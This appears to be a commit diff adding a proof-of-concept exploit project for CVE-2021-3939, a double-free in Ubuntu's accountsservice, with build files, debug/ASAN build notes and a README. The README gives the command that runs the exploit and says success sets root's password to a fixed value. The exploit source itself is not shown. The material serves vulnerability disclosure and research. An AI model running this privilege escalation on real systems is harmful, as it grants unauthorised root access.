PoC for Ubuntu accountsservice CVE-2021-3939

.gitmodules

@@ -1,3 +1,12 @@
 [submodule "SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse"]
 	path = SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse
 	url = https://github.com/kevinbackhouse/DBusParse.git
+[submodule "SecurityExploits/Ubuntu/GHSL-2021-1011-accountsservice/DBusParse"]
+	path = SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse
+	url = https://github.com/kevinbackhouse/DBusParse.git
+[submodule "SecurityExploits/Ubuntu/GHSL-2021-1011-accountsservice/EPollLoop"]
+	path = SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop
+	url = https://github.com/kevinbackhouse/EPollLoop.git
+[submodule "SecurityExploits/Ubuntu/GHSL-2021-1011-accountsservice/EPollLoopDBusHandler"]
+	path = SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler
+	url = https://github.com/kevinbackhouse/EPollLoopDBusHandler.git

SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/.gitignore

@@ -0,0 +1,2 @@
+*~
+build*

SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/CMakeLists.txt

@@ -0,0 +1,51 @@
+cmake_minimum_required(VERSION 3.10)
+
+enable_testing()
+
+# set the project name
+project(GHSL-2021-1011-accountsservice VERSION 1.0.0 DESCRIPTION "Proof of concept exploit for GHSL-2021-1011: double-free in accountsservice")
+
+# specify the C++ standard
+set(CMAKE_CXX_STANDARD 17)
+set(CMAKE_CXX_STANDARD_REQUIRED True)
+
+set(EPollLoop_DIR "${CMAKE_SOURCE_DIR}/EPollLoop")
+set(DBusParse_DIR "${CMAKE_SOURCE_DIR}/DBusParse")
+
+option(USE_SANITIZERS "Enable ASAN and UBSAN" OFF)
+
+add_compile_options(-Wall -Wextra -pedantic -Werror)
+
+if (USE_SANITIZERS)
+  set(SANITIZER_FLAGS "-fsanitize=address,undefined")
+  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${SANITIZER_FLAGS}")
+  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${SANITIZER_FLAGS}")
+  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
+  set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
+endif()
+
+add_subdirectory(DBusParse)
+add_subdirectory(EPollLoop)
+add_subdirectory(EPollLoopDBusHandler)
+
+add_executable(poc poc.cpp)
+target_link_libraries(poc PUBLIC DBusParse DBusParseUtils util)
+target_include_directories(
+        poc PRIVATE
+        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/DBusParse/include/DBusParse>)
+
+add_executable(poc2 poc2.cpp)
+target_link_libraries(poc2 PUBLIC DBusParse DBusParseUtils EPollLoop EPollLoopDBusHandler)
+target_include_directories(
+        poc2 PRIVATE
+        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/DBusParse/include/DBusParse>
+        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/EPollLoop/include/EPollLoop>
+        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/EPollLoopDBusHandler/include/EPollLoopDBusHandler>)
+
+add_executable(poc3 poc3.cpp)
+target_link_libraries(poc3 PUBLIC DBusParse DBusParseUtils EPollLoop EPollLoopDBusHandler)
+target_include_directories(
+        poc3 PRIVATE
+        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/DBusParse/include/DBusParse>
+        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/EPollLoop/include/EPollLoop>
+        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/EPollLoopDBusHandler/include/EPollLoopDBusHandler>)

SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/README-build-accountsservice.md

@@ -0,0 +1,66 @@
+# How to build accountsservice
+
+## How to build with debug symbols
+
+First, get the source code for accountsservice:
+
+```bash
+mkdir accountsservice
+cd accountsservice
+apt-get source accountsservice
+cd accountsservice-0.6.55/
+```
+
+To create a debug build:
+
+```bash
+DEB_BUILD_OPTIONS='nostrip noopt debug' debuild -b -uc -us
+```
+
+Install like this:
+
+```
+sudo dpkg -i ../*.deb
+```
+
+## How to build with address sanitizer (ASAN)
+
+The instructions that I found [here](https://wiki.debian.org/LTS/Development/Asan) don't work on accountsservice. (I get lots of linker errors like `undefined reference to `__asan_report_store8'`, presumably because `libasan` hasn't been included in the link step.) But I was able to successfully create an ASAN build by modifying `src/meson.build` like this:
+
+```
+diff --git a/src/meson.build b/src/meson.build
+index 20d5276..50ec3e1 100644
+--- a/src/meson.build
++++ b/src/meson.build
+@@ -28,6 +28,7 @@ cflags = [
+   '-DDATADIR="@0@"'.format(act_datadir),
+   '-DICONDIR="@0@"'.format(join_paths(act_localstatedir, 'lib', 'AccountsService', 'icons')),
+   '-DUSERDIR="@0@"'.format(join_paths(act_localstatedir, 'lib', 'AccountsService', 'users')),
++  '-fsanitize=address',
+ ]
+
+ libaccounts_generated = static_library(
+@@ -36,6 +37,7 @@ libaccounts_generated = static_library(
+   include_directories: top_inc,
+   dependencies: deps,
+   c_args: cflags,
++  link_args: '-fsanitize=address',
+ )
+
+ libaccounts_generated_dep = declare_dependency(
+@@ -68,6 +70,7 @@ executable(
+   include_directories: top_inc,
+   dependencies: deps,
+   c_args: cflags,
++  link_args: '-fsanitize=address',
+   install: true,
+   install_dir: act_libexecdir,
+ )
+```
+
+Then run the same commands as before to build and install:
+
+```bash
+DEB_BUILD_OPTIONS='nostrip noopt debug' debuild -b -uc -us
+sudo dpkg -i ../*.deb
+```

SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/README.md

@@ -0,0 +1,44 @@
+# Ubuntu accountsservice CVE-2021-3939 (GHSL-2021-1011)
+
+This repository contains a proof of concept exploit for [CVE-2021-3939](https://ubuntu.com/security/notices/USN-5149-1) (GHSL-2021-1011):
+a double-free memory corruption vulnerability in [accountsservice](https://git.launchpad.net/ubuntu/+source/accountsservice/).
+
+When successful, this poc sets the root user's password.
+
+Notes:
+
+1. The vulnerability only exists in Ubuntu's fork of accountsservice. Other Linux distributions, such as Debian, are not affected.
+2. This exploit is SLOW. It might take several hours to succeed.
+
+# Build
+
+Instructions for building the PoC:
+
+```bash
+git submodule update --init  # Download https://github.com/kevinbackhouse/DBusParse
+mkdir build
+cd build
+cmake ..
+make
+```
+
+# Running
+
+```bash
+./poc3 /var/run/dbus/system_bus_socket
+```
+
+The poc usually takes many hours to succeed. When it's successful, you should be able to login as root:
+
+```bash
+su - root  # password is: KrabbyPatties
+```
+
+Note: there are three versions of the poc. `poc.cpp` is the original
+poc that I attached to the bug report that I sent to Ubuntu. It's a
+bit careless with the way that it sends and receives D-Bus messages,
+so it can sometimes get stuck because it's waiting for a D-Bus message
+that never arrives. `poc2.cpp` is an improved version that uses
+asynchronous communication, powered by epoll. `poc3.cpp` is a
+simplified version of the exploit which I wrote after I better
+understood how the exploit actually works.